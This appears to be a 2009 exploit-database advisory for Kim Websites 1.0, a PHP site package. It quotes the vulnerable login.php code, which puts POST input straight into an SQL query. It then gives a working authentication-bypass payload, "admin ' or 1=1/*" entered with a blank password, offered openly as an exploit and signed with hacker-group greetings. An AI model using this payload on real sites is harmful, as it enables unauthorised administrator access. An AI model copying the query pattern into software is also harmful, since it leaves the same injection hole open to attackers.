Kim Websites 1.0 - Authentication Bypass

EDB-ID:

8209




Platform:

PHP

Date:

2009-03-13


           
    	     ###############################################################
             #                                                             #
             #     Kim Websites 1.0 SQL Injection Vulnerability            #
             #                [ Authentication bypass]              	   #
             ###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]